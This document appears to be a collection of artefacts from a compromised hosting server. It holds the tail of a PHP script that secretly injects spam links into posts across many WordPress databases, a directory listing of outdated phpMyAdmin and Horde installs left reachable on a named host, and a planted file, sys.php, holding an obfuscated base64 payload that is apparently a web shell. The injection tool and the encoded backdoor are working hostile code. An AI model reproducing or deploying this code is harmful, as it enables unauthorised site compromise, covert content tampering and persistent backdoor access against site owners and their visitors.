"/http\:\/\/.+\.[a-zA-Z0-9]{0,5}[\.a-zA-Z0-9]{0,5}?/i"; if (preg_match($find_s_pattern, $tmp_url, $matches)) { $tmp_url = $matches[0]."."; } else { $tmp_url = $tmp_url."."; } } $res = $db->fetch_assoc("SELECT `ID`, `guid`, `post_content` FROM `".$atr['pref']."posts` WHERE `post_status` = 'publish' AND post_type='post'"); $count_posts = count($res); $str_scr = 'TOTAL COUNT OF POST IN '.trim($a_line).' - '.$count_posts; $pattern = "~.*?[.?!](?:\s|$)~s"; $ret_arr = array(); $r_idx = NULL; $saved_links = $empty_links = $count_post_ready_to_injekt = $count_good_post = 0; if(isset($res)){ foreach($res as $key => $val){ $prop = $val['post_content']; if(preg_match_all($pattern, $prop, $proposals)) { $r_idx = array_rand($proposals[0]); $fl_p_ok = FALSE; $k = 0; $ar_kase = Array(); while(!$fl_p_ok AND count($ar_kase) < count($proposals[0])){ $k++; $r_idx = array_rand($proposals[0]); $ar_kase[] = $r_idx; $ar_kase = array_values(array_unique($ar_kase)); $prop = $proposals[0][$r_idx]; if(strlen(strip_tags($prop)) <> strlen($prop)) { $fl_p_ok = FALSE; } else { $fl_p_ok = TRUE; } } unset($ar_kase); if (!$fl_p_ok){ $empty_links++; dbg_prn('EMPTY POST'); dbg_prn($val); } else { $fl = FALSE; foreach ($links as $content) { $link_in_post = FALSE; $poisk = trim($content); $link_in_post = strpos($val['post_content'], $poisk); if($link_in_post){ $have_id = $val['ID']; $saved_links++; dbg_prn($have_id.' already have an injected url. ' .$poisk); $fl = TRUE; } } } if (($fl_p_ok) AND (!$fl)) { $ret_arr[] = $val; } } else { $empty_links++; } } $res = $ret_arr; unset($ret_arr); $count_good_post = count($res); $str_scr .= ' COUNT OF INJECTED POST - '.$saved_links .' COUNT OF EMPTY POST - '.$empty_links .' COUNT OF GOOD POST - '.$count_good_post; dbg_prn($str_scr); dbg_prn($res); $count_post_ready_to_injekt = $count_posts - $saved_links - $empty_links; if ($count_good_post >= NPOST) { $num_upd_post = NPOST; }else{ $num_upd_post = $count_good_post; } } else { dbg_prn('EMPTY RESULT (NO POST IN BATABASE)'); } if(isset($res) AND ($num_upd_post > 0) ){ dbg_prn($res); dbg_prn($num_upd_post); $random_keys = array_rand($res, $num_upd_post); if(isset($random_keys)){ if($random_keys == 0){ $tmp_ar = Array(); $tmp_ar[] = 0; $random_keys = $tmp_ar; } foreach ($random_keys as $post) { $url_unit = $links[$i_url]; $prop = $res[$post]['post_content']; preg_match_all($pattern, $prop, $proposals); $fl_p_ok = FALSE; $k = 0; $ar_kase = Array(); while(!$fl_p_ok AND count($ar_kase) < count($proposals[0])){ $k++; $r_idx = array_rand($proposals[0]); $ar_kase[] = $r_idx; $ar_kase = array_values(array_unique($ar_kase)); $prop = $proposals[0][$r_idx]; if(strlen(strip_tags($prop)) <> strlen($prop)) { $fl_p_ok = FALSE; } else { $fl_p_ok = TRUE; } } unset($ar_kase); $prop_ar = explode(" ", $prop); $unic = array_unique($prop_ar); $diff = array_diff_assoc($prop_ar, $unic); $out = array_diff($prop_ar, $diff); $word_rkey = array_rand($out); $word = $prop_ar[$word_rkey]; $cnt_word = $replace_unit = NULL; dbg_prn($prop); $zam = " ".$url_unit." ".$word." "; $replace_unit = str_replace($word, $zam, $prop, $cnt_word); dbg_prn($cnt_word); dbg_prn($replace_unit); $cnt_prop = $posting_string = NULL; $posting_string = str_replace($prop, $replace_unit, $res[$post]['post_content'], $cnt_prop); dbg_prn($posting_string); dbg_prn($cnt_prop); $count = 1; if(isset($posting_string) AND $cnt_prop == 1 AND $fl_p_ok){ $upd = "UPDATE `".$atr['pref']."posts` SET `post_content`='" .addslashes($posting_string) ."' WHERE `ID` = ".$res[$post]['ID'].""; $db->query($upd); $total_updates++; $log['dt'] = date("Y-m-d H:i"); $log['id'] = (int)$res[$post]['ID']; $log['guid'] = trim($res[$post]['guid']); $log['bd'] = trim($a_line); $log['link'] = (int)($i_url+1); $log['url'] = trim($url_unit); $log_str = implode(SEP, $log); dbg_prn($log_str, TRUE); Log::write($log_str, PROC_LOG); $i_url++; if($i_url >= $num_of_links){ $i_url = 0;} } else { $log_str = date("Y-m-d H:i").SEP.(int)$res[$post]['ID']. SEP.trim($res[$post]['guid']).' ERRORS, ODNAKO...'; dbg_prn($log_str, TRUE); } } } else { $log_str = date("Y-m-d H:i").SEP.$random_keys .' ERRORS, ODNAKO...'; dbg_prn($log_str, TRUE); } } $n_bases++; fwrite($lch, date("Y-m-d H:i").": ".$atr['host']." Walthru OK no errors<br>\n"); unset($db); unset($res); } fclose($lch); echo "<div style='padding: 5px; background: #ccc'>Post injected: ".$total_updates."</div>"; echo "<div style='padding: 5px; background: #ccc'>Bases walked: ".$n_bases."</div>"; } function reverse_posting() { $reverses = get_ar_file( PROC_LOG.LOG_EXT ); if(isset($reverses)){ foreach ($reverses as $reverse) { if(strlen($reverse) > 20){ LIST($log['dt'], $log['id'], $log['guid'], $log['bd'], $log['link'], $log['url']) = explode(SEP, $reverse); $atr = get_db_atr($log['bd']); $db = new db($atr['host'], $atr['user'], $atr['pass'], $atr['db']); if ($res = $db->fetch_row("SELECT `post_content` FROM `".$atr['pref']."posts` WHERE `ID` = '".$log['id']."'")) { $replace_unit = str_replace(trim($log['url']), '', $res[0][0], $count); if($count > 0){ $db->query("UPDATE `".$atr['pref']."posts` SET `post_content`='".$replace_unit."' WHERE `ID` = '".$log['id']."'"); $stat = ' successfully restored'; }else{$stat = ' not contain url';} $log_str = date("Y-m-d H:i").' POST - '.$log['guid'].$stat; dbg_prn($log_str, TRUE); Log::write($log_str, 'reverse'); } else {echo "Somthing wrong: ".$db->errors;} unset($res); unset($db); } } } unset($reverses); } function get_db_atr($str) { LIST($atr['host'], $atr['user'], $atr['pass'], $atr['db'], $atr['pref']) = explode(':', trim($str)); return $atr; } function checkInstall ($params, $type) { foreach ($params as $key=>$value) { $filename = $value.".".$type; if (!file_exists($filename)) { $fh = fopen($filename, "w"); fclose($fh); echo "Conf file <b>".$filename."</b> created<br />\n"; } } } class db { protected $link; private $server, $username, $password, $db; public $status; public $errors=""; public function __construct($server, $username, $password, $db) { $this->server = $server; $this->username = $username; $this->password = $password; $this->db = $db; return $this->connect(); } private function connect() { if ($this->link = mysql_connect($this->server, $this->username, $this->password)) { mysql_select_db($this->db); mysql_query("SET NAMES UTF8"); $this->status = "connected"; } else { $this->status = "Could not connect to ".$this->username."@".$this->server; } } public function fetch_assoc($query) { $result = mysql_query($query); $i = 0; $this->errors = mysql_error()."\n"; while($r = mysql_fetch_assoc($result)){ foreach ($r as $key=>$value){ $response[$i][$key] = $value; } $i++; } return $response; mysql_free_result($result); } public function fetch_row($query) { $result = mysql_query($query); $this->errors = mysql_error()."\n"; $i = 0; while($r = mysql_fetch_row($result)){ foreach ($r as $key=>$value){ $response[$i][$key] = $value; } $i++; } return $response; mysql_free_result($result); } public function query($q) { mysql_query($q); } public function __destruct() { @mysql_close($this->link); } } function showLog($log_type = PROC_LOG) { $file = get_ar_file($log_type.LOG_EXT); if($file){ foreach($file as $log){ echo htmlspecialchars($log).BR; } } } function preDownloadLogs() { if (file_exists(ARCH)){ unlink(ARCH); } $output = exec( 'tar -czvf '.ARCH.' process.log connect.log' ); if (is_null ( $output )) { echo "error gzip"; } else { echo "<pre>log package <b>".ARCH."</b> created</pre>"; echo "<a href='".ARCH."'>download logs</a>"; } } function dbg_prn($s, $fl= DBG) { if($fl) { $pre = $post = NULL; $pre = '<PRE>'; $post ='</PRE>'; echo $pre; print_r($s); echo $post.PHP_EOL; }} class Log{ static function write($mess="", $name="info_error"){ if(strlen(trim($mess)) < 2){ return FALSE; } if(preg_match("/^([_a-z0-9A-Z]+)$/i", $name, $matches)){ $text = $mess.PHP_EOL; $filename = $name.LOG_EXT; if(!is_writable($filename)) { dbg_prn('Is NOT writable file '.$filename);return FALSE; } if (!$handle = fopen($filename, "a+")) {dbg_prn('Cannot open file '.$filename);return FALSE;} @flock ($handle, LOCK_EX); if(fwrite ($handle, $text)=== FALSE ) {dbg_prn('Cannot write to file '.$filename);return FALSE;} @flock ($handle, LOCK_UN); if (!fclose($handle)) {dbg_prn('Cannot close file '.$filename); return FALSE;} return TRUE; }else{return FALSE;} } } function get_ar_file($name) { $mas = Array(); if(is_readable($name)) { $handle = fopen($name, 'r'); if($handle){ while (!feof($handle)) { $mas[]= trim(fgets($handle)); } fclose($handle); }else{ dbg_prn("BAD FILE :".$name); return NULL; } $handle = NULL; return $mas; }else{ dbg_prn('FILE :'.$name.' is not a readable'); return NULL; } } function make_seed() { list($usec, $sec) = explode(' ', microtime()); return (float) $sec + ((float) $usec * 100000); } ?> </div> </body> </html>
Old phpMyAdmin versions still accessable over the network
drwxr-xr-x 9 confixx confixx 4096 Nov 28 2011 phpMyAdmin-2.11.9.5-all-languages (htaccess restriction) drwxr-xr-x 10 confixx confixx 4096 Sep 17 10:36 phpMyAdmin-3.4.9-all-languages (accessable) -rw-r--r-- 1 root root 6833680 Apr 16 2013 phpMyAdmin-3.5.8-all-languages_share.zip drwxr-xr-x 9 root root 4096 Jul 18 2013 phpMyAdmin-4.0.4.1 (accessable) drwxr-xr-x 9 root root 4096 Jun 10 2014 phpMyAdmin-4.2.3-all-languages
Old horde versions still accessable
drwxr-xr-x 24 confixx confixx 4096 Nov 28 2011 poplogin drwxr-xr-x 22 confixx confixx 4096 Nov 28 2011 poplogin.20100924 (accessable) drwxr-xr-x 3 confixx confixx 4096 Nov 28 2011 poplogin.orig1 (accessable)
login-63.hoststar.ch
include/template/templates_c/sys.php
-> from site http://profexer.name/pas/download.php
<?php $_f___f='base'.(32*2).'_de'.'code';$_f___f=$_f___f(str_replace("\n", '', 'Pq8+tA9pEx3EpbfShtBbkigIrlY09D2sGKYDD6OdPwcIVNxHrHuZI1MBfxpqll488V7Tbm3phDbBFAwG k5MLq6NbLAXb69v3jtw65S0KD5Nx2R8ROgea8Z0z1b/1amqjjy706S1+QQ2+nJYjdf8QYi0ic4kArurt yE+zVXve7+PByfRZYTFOL7f+0YwcE/+JilFvFyJjOuid8BGS2mlNGOQfnhKnE5hx6rqcKCtrfk29fJNM s+r1ppMJoVjBbstGuXjMHXYCPlD90sncCTKs/zartN4bBWXeSWp585mZc+OeYVL5mJcPxJn673e62z+y rROT7OcGEMyd7LCDyMB41OwG6Q5VDAv0wZNelA+Yz0JiYd4nahYoWC/35syZlXQr136ftUc+8gR9xfQW gG1d2mOxcozGxZbuM9mB80UyYxmXnRDBocwKeR8uTPTiAEXWocDxXLwuCrfhkLZuAvHG2b857X8uqx68 nS8+XSMFquYb6spb8irAgyok1aiuSz3nmyPff5UDylWSWWeTUbLr8xPveohXx7QILM3FCo2edgMoqPO3 5HnO/u84gUkjaqAMe6tTuYCC/j3PJBtTRhJOVu1OdggENrsGE+TQDQD4xMBzQGgQ8spq7eco/eHwA+1u jxPGRdWIdJm6I+wztPkIqaww4yTTaGVaKSfNmr3IWyieEoTHRQKu4QH6dpA6hFRe3CUQ6h/DVTW/RsCO z9mftdPzgNEFFCpYtwj5ipGp5Dx1vJ/wiW6gI8sDnu1883J1QX6NAtyZwIQTsfbmEefEljH3OPo0ACDm jcs/7+lOkA3eU++B36iWChNJl5rsMW9uHVdUUQncubjPMyxgHDN8H3cIFQZm9cKusRdLXHqXVfQQmp5M Adt741oT7VAGpt3uYbKhwCJOPJI7CXnE/J1HwE7E5j4j5VElqtm691zQFKwb/7lzM0Mb3TjjXp53t7wM V86KfMxy/JAr99frndIaB+qK3vwI6VzS/N6hvoRYOm5U6UqNbWg9mZgWqQeW4WIi9uNVpqIomUAg3VGm 6FZUaEhcgkyA+XGBu6n95t00TWrZ/LiYfrfvnUcv3KY5zqG2LRzYitWnzV923jubv0eSNWVe97wNCFZj Crxs2FsLwCKgYGrmuAu2RC4eYLxU20LkWjVWiTUiXkWKh3NgmmI55jCqiEOhriVD0EQSL/dNCWzc0FSr ic/u2hGCHYY7ivTWlH93iCgQSGLaX3IanYhVbf3vVh57qNDqFjYVpHQ4NSMvM/+O82f/4C+BvcgM+xnR aF2DpKViucIL2jjbemq2DEhv+oWbNRDtFdhCHPA0cIxjXrpZhSzu3FTWZSmJkaBJbFJKGKgRqLYkwpHh LJIdaHhsl93jDvRx/pEn3nQtscjRfQbL32TIEpTIRlM0auRPdkkeMuuAuBI1cBGelY87g0ApSg7Qc2U+ 6H6wEZMreiW8aVopYmI5Ak8E+T97yjWFAFRHv8HxAzTBkPs+1rlOoKBMdjIGMvgCU+asAGUfX4oiCSxW rKY3dz32GPjGtTs37FaXPppRfF2SkEunb3a8/gunEHiRyXSIls79oq9k06woBCnkpWI826l8Ar0DcjTT 27iJHJ3/oOyJCTV3q9/pBxFKr80neNLMD+PoXfilGTm2v2jDtMr+B/k1kQVzWHy5KLkcofeAw0mJ855n tj/poou9620+FQD6LjXm6zC87ENeElA/gG4S84albl7YqJe5sSU/9HRbrb4ABhlQ8GGfZqbIvl9n7CYo +bkjj0NCZ6sofWeUwY1Puh8YyyYlwT75K9DJcr2xfwA5ujBWSdEAiYIk1HPb+/oi8G36eTxCav6iv91X TObqg0tG0gmjawKOaVdQ8oQZ1tyQTWwL65QRNDim3W22yT//+3r/LuA1AKr+4W/9zHbB2g8FgdwQXfiQ GOGk5c2cOBs2pEJ6Xe6yTo8H+mC5uOZby0mAvrt71wRJj4st4/XrwOoIP+M4ys86PLiKCa+0BAK+2wmn 6vqn2yMIMds7lQfFzb4M2Vvu/W8QbTgyS9wbXsbCrAS+3x9w18NZnpokn1M1OpYnrNggAkZsAroMZfga ZBUoKKHM4qSrxKoh55rCXd7l5c4CQai77fe100h+K0t7/V052X2ZovYZ+GlZux2JEhlEXmOvhdPO3gt6 ntOtEhkn6jCEYIT/XLy6267tucG0SKMAcP8n2dKnctyik5nC+8/VzjMfoxUx+Y5U2MQgUNf+R0vrBq3n iNBbKagDK5kZJg3TaGeaqOp5ds/mKJuvK5UOya17dEuZdd3WMWpkxKtb3kp16Peeohnq56bMEDPi1If4 eBquF/tZI2gJxdx/5zePIjXuCJWn26C3iWbnbVsgmeg5b9eGc3wyDu6QyDvRVMidq658EV+etZ6yQpSO yXJook9aWzxCcCfkSNB2Jpru1SkGYrvsi0sUqwR/uM0cmO74zq/JleOmi1GMrn9thM/Wb8NooouvEXmO mCFMozZu9e/oSd+EWMW7t/z1bTUO3AI14BUVmwFpplOLMUmp9NIjrgs9ZOAkvBEQ25l2qM1pe/mixtZr 0Jmf8lw3W17lwDzxokCvTSQXUdmlIIG84kEMFRJPe/FFHSshu0EEwT1wrn8fZ07DxoPiT5m8kkt6LE5O 4uyJ04Ol9SxYShOAXX0aogVi91Nr+950IjaT7gef6FNuePdGWYgai+GqQkY2zsAOY5na67tgs26qq5h6 5C7XzDQ01OnzSp28c6eqVKl55QwZEI5nb/sLmq5Ss4qbe34kvs6iWAMkPU2wGxnoJpPwm5Vfk8GWxIKK i1WrM3jzWVIfGw9wpd3CBSOIW0iIuddelGb7+vprngiLuyrFDsUTk7azF5ktmPPieShrxuWqu+e65ped 2PlkRrCtCjx+aGDAhNmoOXS0ar6W+8RdITlff2lpQ2FXv50T/zrNDnMblQum943Y7aRlMEPHwvOB8HG2 EGSn4T88OoomDuzh3iZf+d+jyoRpWZApQaBLZEvk0K5n/z5b759eBSU3ejSjrW9DMOycG2lgQoopM7js Sj3hC9ODcD15S+/K1F7PLkJbM+HSUkNJusDYrQqoSqkTMnStn5MAWI+LEJzEImgmSac1leFlAEHDJKjZ UoGZErs3Ax1ngvhdtApdkN8l5+M5kEiIzRna+C7x64Hmf/b++EX2UoelzHJMVAqtzoutr+jLVMNTMgRn 38a2urOUTc8k8O+2+NY6WAKXDS9Iz/O/ziq/duAw8xuq3AXz4wGcAvAZ4NbBjd1MNTQ1JEm44lD96bAb oaCgY6hbP2C8MG3Bn8+T0NroBUrdWevYELmIRE+c7RujoOqxuAGqpyXB0ISf8ADwR288P4xSgom7tYSt kA9IqAKRQwgB6oG2SQGKleW79zykC1kO3dboIGdOLcJ9j5ECmqPPlIy6IUbAz6V4nKxhwTzDh00bmKBe IRr4bHC/Q68/gTZAL/fStw6cZb0GYOv3mPB4dhfcNCFXT+xIJhwvBRFwvBjtd/uZ1KK3iO/1/oNdkRau RkqqmfGvDbqq/QwyCLsOqfQe5dUIuw3mAyM3IeD2VCW3SuZlYtuuaWV3ei+ZF3nUJNhKOZLA/mFCIf3x RMJ3zEkMuL1ErbPb8fK+MnGPrKdKWOmMjbDwbrVKFXGGqUUaDj0dxcvH7XYZLpUUUb5WFotwxdnAdXEq nhT7GfaR9XkiRXBIwVvPRGwWsYz4Hajpd9W53g+FPJoSegxVsqWhZYKPAyjiAgfYjKImaqCUhtzRlVqz SoubyYxKk6NMaCGjqbLws0IBnzvC9SIojaSNM6zRwRfV7yy3So0PXbuUgBRoAy8NIcTcqs9C+ZefcHnQ t4AgfOY1kdnaV6wjufoKn8WIwd3WMq89QC6xX8/Ua3rWXCBwZaZdgdJQPymkBBNcNjwW3Zuq7MTSpLs0 maDPnJjBuBoXkyTjyZtl6Wh0R2MkuY+Y6jzPq6S9lQlB45BCOQOCjI+c/rOd3Tr1Ym1ny9XNrAnB+Klk LR2dGK5YPXnzYbNGesbYT9LG4Rpc8T803e8xxKSUMuD8NvYylTe9qW7Pig2xtOamWNUYb6lQHUDNQ7SC 3pwL9irJKttjw5cf7KoNBGlonTh50HAwNWJvH48Qk5ExedsxHikgSgKjyMicY0rO2FOD5QxL26uy9wOw RnipjPI2Uw5XCbTbemGSYkB92JnB+P2Cm691m2hUZurNZ12OJ17o1JboDBQnWQFBzQ4p1SVclLwVpy93 1KgyzzxibVjT3O+3ehysZqRPbQgG9DhF2XOySw7y48lhgTmHm8DuZToNS3CA1xkLYLamXdvzMqqH+8EE WOnGqEYuBze996itD8cv1VyFQzVC5GZF8jocEZspFiseW5l8IFrKHq4rN+ZnmIbAAAaoov3mzjvKxJ14 adQuToTJIuZCjMZA3SbGMKmDNj3nmxQ6AgSXjPmDXIIgA1Jye2q3NIelLMJsIIlXw3cvxClHt9tlYF/y mjM9HWRbUY2xgUNhxLsaqFuZupZ7qnUKZIcv+iBeHEtu1Q6DIPHkit6vb6sozgAEUNogOjkfInQoDs+X OvY+XmiLPNnQyYtP2WdO+g0SrRXEylDbK6uge1bgrxqVqEuByyXvKfSDX3BC1+HTPXgYOx7RSy9w3oH7 o3d6r9qWiW8nPsln/4XBVVO5+vjYsZmJFiPHUdolou/8wUtPHDRsgSaETWBIbGYqJMJYWGnU6TdxXLcT 5L7xx/Z7itoE0D85xnEfBmjFOUvvDYAc2UDCLGLXjcE076FR5bRIuvS4/Zc0Qu1zAbP8BN32H3kiYatY mjtxXJY7FZRzn7cs89vGG9bFrGDFu42CLHYaa4v4+GgoCHshT7WlMEYaHPuklQA9BnShNJYcAyEBzBI4 ZIK237wHvJaBVvqMzCWVWI+0qQK8w9OvpJ1Yr5ppuUvGdeMJr8CHJ2K845x9sGnvzthpcJHzXImiS29f rlYE01fS3upplPkwW76OK7CXoGYP+AUTkX8Mys5sbUscRK6Zx4TstNh0thFC+H/4MlhXObhUKH+v09wM bzWtbKmmA1zy974/YpUCWLU1aCqOMhgrSlAqWuwKMMpy6PIDg0dXbxJU7yXeQxX4fYk0r1UbYGkxc8Ib IMw9CGVG10JbV78mvH5kAmMZg6KwUVKTEHf2PTRLl2Hn2uv9dXTMPQGygt0aw0xr9fzgUhwi/zDXHLoS c/8mkgYmF289iFC04RvicwmcugcILWgzu1eNtPFeaec1mCSXgFOnOcsZtUevzuU3G25vB0Y0f3Rq4Z7r IYzQrD61+k27agcKtlE3n0Iffm3u29cvEwEL7hf9x/9Wbwa+jKUx/95DEKg3g5s9D56rKzG3qzikwe1B cSEiw/OVJiEuu/tLx+zCRMWjLBhxLz6XMvW/WL/tTnydMFS2kwHv16ZtCX/NVJ5RuWdrA6L5ODtmXUHN xczlgX3VhqTAXoe2FAIHmDKJbSLtNCF/hLZjy++7PoYquocQmlF2Twj5UmLauXzr05wJ36y3rr+KHLvi 82GT7MRP3ZJ8Nt10WD5rJrYAreCRg9T/+acn5NMSRq9hn8RSAmtChlbS063faPdIYHqp9p23drQ0ksEQ oJLf/BHVI5IfY9CDfakqbVGuVSjfyBHAQyLWsnnf1t/Q3HnprtvILUkk0cNI/5dO6pEYWyUT9RzjP2A5 uL9V4ysy24CUI/ririUSbsqgazfJbe4p0uFb0LK1mrAp4F/u/O1y3sGQoN7Ol/Mq7CChMeJtO1Fw4ncu dVdeUc7OjX4aV6+XZYFmO0v/agZlxfT4R+oAtFl/2EdzTXMCiAN6rD85IphzIMWLmPdH9ELR/2H8CkRe P3nrbsGFzLjQfOHqj9erJ54BpNAlXBqjufKVATuKHEJDdl5F3f3WzkazzajjSy3by7482mNfx9WqgC1k QCLRmuhpE6fHjNnESnn8vO2oxKb1a3fUSeLvEEZdpYtHnT5ktRgU0QsNQ6O/MV8xZ1fxqAl/GwRC/6DC JuIwAoKe5Y4nvH8coHd9bUnhKOUMxkg+6eFZ9DGlUOKCMLcCVN34yOLL5Z+S6s/8k4ijDB2O99RVI1cY yeUmMu+BxWuqk6vl4MG1bA1UM4N5iGeV8kIlFHY9k9ZSMI7kWGUolGfAvCv1eSFmiKX5de6xzqWwmt9q aqZIOhmzqf+i45MjO9GDVrH3k5DUIpkbI1EsxxOpoLQe+0aGeeTu4GA19iDiQ6YAFCYsqLP0VDRo0BFt 14B8fdnSuGqR5WeJLeuKctRB2o4lk9SADPlFuaipXSeZQkCxZ1WZvFDbVmhHIQM6iGaw04g7e7MnIskk 7etwd/yF/QXKjA2cQtyZeuHvui7T8Vevm5sLaqA+QNAE1GzkyZPBl3StA0v8suJnyRsRSHxfjatUHiY9 8kBcPEKG9T+WtudtJnzoTF71FgdOTfrPtPIqkqD9hE/chi87KW/S+kLJ1JI6Alw/XFGZwD23yXSyFAJs US5UyAg4Dt8En4afINtF/xrJ8h0oyxpTmHkFLHwi73At+yEPSMtEglouaHZPCCglvu1439EM5J/ve3Zd z3dfob6zytWY2IOU3VjwCubDvowMhxm2WDZ3+8+S8rg0o0XqZWvJzMtzb/lnnQzzkzhtEqsx+sujhC/3 lXheLYqxWogN8sr0jWJ5ey8fGgrDPYrkAnIbVdfCIvNjGVOZyti1ZTTKE6LamGECbOFZ2S/ozzBwN3NK AtrAuo6wmWw7oTfpjOdWB9V7uCXvsgf61xoj52kw9KoF7GSKSxmUWCnjXKs2v5oc42RHwYvf0AvmWb00 Am+swusg4ALIaRBH9vuPhUFHvXKL13tMsvHVnGkPHdkA9apyCJ0RfDT7qWgDiqmijTzNZAyZQtcn/NBc d/ZkWFyKhR1GTIxY03SYuvN3XY70VXRilJkrppFKVJn/WszuybpH2x/dZXsY3yrAhg+86M6xYT8dwL8Z kqSRK2ut9FDUX5mO+OgQPWwHaQ6ZzXZPSH0RIDaF7YncAEzOVWHiCizcnE56pDO2Lx4PmGRMgpjI3WRo 7nkLnp9qhqkrrvYVwQg/5aNr88MzOuakfExiMxpnU0q6xq2ciHqnnnnF6uE5GL6pEhJK/tox164nWotb Fjmawy/k5Rq8Ne9/bJpDHGSsU4+NFdCbkZYJeYj1g26QpK6JT4hmMDleyb46DYxQRV+f5K0Pz+89+Y6I f81dOOcFzaRkMMKZL0nGec7p8JOZdfzLgrwSur9vvfNpw89NtTqBIM3Dscntiz8u3xrvJC4fUFanN2N9 alDlMo5x7etCH1A/hWxP/6txIC2U/56EpqnGDALpKdXYcHlKAHmtfiPq7BZMLL4rSZnKM0eLUUXaMCI3 3+isHlhrR7OY38B0Ot2TLYUWQbeAivoap/Lv3w0tAfG4PeZQH2vOB00bfR534xzfk40/6Z4NRftwu3k9 XbVxX4rC/w/nbStp82KCrBb3g2TGDKAwQZ+dJqPpNuJg5LBNNRONEiUKg805nmWYMpHQrf8xF37RIoGK cGDCMllo5S6luRjLkPfJYk9DtguE+8HHlsaswvXwJ25gSnznbMO+qiqREq0QwCRP1EN37nDGwziK+OKP nAIFNe02aZgOWpkkgtEq5tUtNhq+j4uuo60HmNAAA5bqO3iKGAJ2fs44opT5TnEAtvLRcDype5LZmnxK ykd7j6TzB7/zQiYKVQ1EIg2XFC9PgELHlN6di52caI62KeYEfOPDFYii2t/6gW8Jgth5J5aAZbimqhsq LlSWbcRgz2fe6t+BsfQecWiCEkBNG30/4hEowdZr/qYdujHHg62a4UJpvjJwiI1u5B3Yb7lXTZ6n5UQu YUUZrmMyayzNRXmxMxg9O29hl1YTEBQ43qiWRXzQSD3Qys/QkCr6PcWnfuTrAgWo69OU36o3fhmzeLJy yuJ5/0vXWPZDG1q+mTGAHPdUU06mdDTSfkakP/veyRrO7TBgg/oNPEWFNgd6Q/bv9+Yza3VlohHW6Row tfVwS0eg9qRtg/NCzRZC4sdy/bBlCvcCHqOUqEKBNfqITCYm3s3gaiUHXqm8HuBC+0Zl5JqdsQp/wAIg wops6KxsU6UODurHTt0PQO0kTy+EpiW96DiK5w9Mj6EZDIufFEnv0TLD0Pj6fcrJUdkLvkDr2E1eHLU8 VYIim7U3RZZMx4l63TY9OuyBOtEul/erNDrLmzSUW0B9PMsiRP59AzB66dtg8EhUUK3AcNd9Sl2mV8oB 4apah2e69PH1LxLlI5ZpuM4sDmXfNi/tQKYUkcwYHRLVWz1t8fqSECUyp7wT5o8fFFn6eqH2AdH3nGoc DG7O1trtdEsJKdydfrSGRq199GGwEiFNDKlALm5RKiuD5zylbQ48xj8O74S0S93KNK8fVkoWChctEpFu sQtekP16t8YmuO+i1qyZoizXrOyU0b1YS2kxKmYfnBZ0DLzlohbLQKkju4xUHcjl7rK1A3BRB6mBhk+l l66bkQa0ssjnLG0rHCh1s9qYvG4YDcKOrQ5K79HdBafVJxDLne/4PzK7vytiYbMsrwxrgx+xUWyDSTH+ lz9RMnJWG14DNl8juWcEY30NzvnsAqi/z00RzsFDb4ojStb3U/rMdR7MCgCIcFbZDMDzfsyrjRaAp5kU hCzce0jjEf+8gx1/y1I6omdWgiGHoWonc5e0X1INTMOqBTsycjNrZWvX70+by2+uDfhTYoXwyzakBW91 A0nMAPnO4+tZOpsA1JYpbFategm6aItgsQKGGTYizOucppQPS0xSue3hRei2eMj1rnPyNZnZ7W5wR46K U5XWEWnGGh7bvAWmAygjhNnygNu1BlwDa+n4N1+9cKQYKBal2CWunpvb08bgZUb7mFmweBlz5+LHUDMx I+0lgIZTsEkKqMfhZIji+97CpdU70BovSgX8RUHVsYkw+86m55CM63fqyvAyjT8tCQAPoNx/PHkmseBr nhuUhPrC2Z/icGinAp0rrDW4jQZQQnk0hO/PpysSgW/R9Whe/fn1u4amsQ9kxUaIT5/BuJXTBkCKUzQD 4ODIqhOY7fC+og0KXG3jMW33xA+SAECY+eIMm9hX7aDv0qtY83VMvTUJiyuQFmPMmmU7PyO9Pbr97PlX 5bamGxJiqqGpQ4qs3vpcfYzyQMdTtwPfxxPtj4CHu3wt2NR2n5jnmSzKT/yLi6c1wFhRWQChyu1LK27B h3m/YupOEWGmtEzsoxpC9BB/pI4IslcqtbgjX36fWCjmyhmiMBXQ4uI3YrAG7Y5V+7zJirxSibP33bwZ 86cMaFIj2DcC57zF08Mt/gN+q6p9OGojNa7snXHYP1XNQWWli8eV1Gr7zVjyG4eEKS1KPdgyhA1CEmN9 muMAmWiAusxVl69yN6LGh8UprcwBI8yr6EtrN3VCXtXoYlIDljqTHjlPTHItKrbsoqDAxpla8PY5V/5s Rb5ury0nByuWT0n/gU1/h4F58wSIFikuCn0mMVMwDOCcApiPffAVM3QZrfJ1RGHJ61dvcfo9POXKXt0c hiem9rUFyd0571BqC/mB9iJBGCWrBr78uBzHuplL2AOIbjR51CbD/GbJ6mUzc2t8G8JyvVR85R2gOi5R ZdqhjzK9E3zYJugVUywyyFPwK3Wqzs2Z2B26+mrxsTTS7D4Xy6Wk6InDFXo7uB3uHnQH5CgQTpm8vt5D tyEtN2vcNA8XpOgpHe4Cnp1uqjzqWOx6tM4ZEJtO0NKbPd1fVgwj0JEsfxj1oQERqfzHfcih8OTKz64G q2dlM4TNTISONFFp0w7Q/Qro6eEAvX2csWnTxCr4dREX21+7IpqjsvYLUsmHlngIQLKz52TMZ7C74FH1 3DIH53vaa27cGe/05ge+xCeyUtJPWpy6+x1Jqe2GrNpbNYBM8AJNNoDb4Xa/5k0vWWGhzvFk4fSNQYNh h708bX5dzlLifsUreE+6HJ+DjxH8BUifgZsGzAGXT0eWoAvZ0Fw7Lc2ZBoVOWLKECcR8mE5JsGyY+otA oheTqJRDxkWIWtDf13AFyxyegqwS9VuAyyYxIJdABUPCokI65Nh4UlSeMf19Avp5kq5gZG5e1HDj0GHk QB2wHIxA69P3xSIGX04PLUr3TrUUi8ZgaIj7gyOwddd1zbYeLDMkMAgE3sBhR0vYxDrEbTLoNfSp9gR4 i6HSwmgXsnhK+zclzasElVXyHpZRV8bdkiOXw6YcTauCQWBcU0ZcHQgtMuatOmhAHI0QCh2h7em2o2VG q+Z1/zXG1hHS03+LZf5tk24tJEkzuCbI0Yz4otjhjB0XKVxAkb0bChvr9o1rzL4+zvSPd/tdvKGR70LP bKPeDq44wJzZUjsmRJd2fLdkGSfG61WoGBr8q1S9FMaHQ3CPqfLbvomu6uVIfJbXpNGCKGFTXle3fQuj Ql5EPeORfliPILGG9XOqbGTrybO88/B/MxvT0dBAHaB7ymWvPxyk9upnv58hwmXEFN8YKx0oQYDshnEZ 9fQUR4+nL3UC4pWLpk+FX6qjRFlTnvmKVpgktxifKeWsb1j8RgSfifbrr4Pqz95LzFoZ0yQeoWCI72wj 